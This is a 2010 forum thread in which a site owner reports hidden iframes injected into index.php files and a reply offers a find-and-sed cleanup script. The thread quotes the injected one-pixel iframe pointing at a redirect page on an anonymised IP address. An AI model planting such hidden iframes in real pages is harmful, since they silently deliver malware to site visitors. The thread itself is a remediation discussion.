Thread: Security issue
-
26-01-2010, 12:42 #1
Member
- Join Date
- Feb 2009
- Posts
- 32
Security issue
I seem to have someone adding iframes to the end of my index.php files, for example:
this happened previously on a number of sites and i was told that i needed to change all the ftp passwords which i did. and was assured it had been deleted.HTML Code:<iframe width=1 height=1 border=0 frameborder=0 src='http://xxx.xxx.xxx.xxx/tds/index.php'></iframe>
please can you advise asap because i have clients sites with errors stating "malware threat" and they aren't happy.
-
26-01-2010, 14:29 #2
You and your clients need to remove TROJAN (use antivirus ), then to change FTP passwords
and
create file fix.sh with:
put fix.sh in main directory (like /home/www/[fix.sh]/user_site)#!/bin/sh
for f in `find . -type f -exec egrep -q xxx.xxx.xxx.xxx {} \; -print`; do
echo $f
sed -i "" -e "s|<iframe width=1 height=1 border=0 frameborder=0 src='http://xxx.xxx.xxx.xxx/tds/index.php'></iframe>||g" $f
done
and run (/home/www/fix.sh)chmod +x fix.sh
try it
Make your website the fastest one - Web Optimizer* web.stakh.com
-
26-01-2010, 18:08 #3
Moderator
- Join Date
- Jul 2008
- Posts
- 176
Hello
I have updated your support request including necessary tweaks to be implemented on wordpress site. Please let us know if you need further assistance.
Thread Information
Users Browsing this Thread
There are currently 1 users browsing this thread. (0 members and 1 guests)


LinkBack URL
About LinkBacks



Reply With Quote

You here anything back about the banner on the right ? Tis driving me nuts having nothing but white...
Anyone else having issues on the...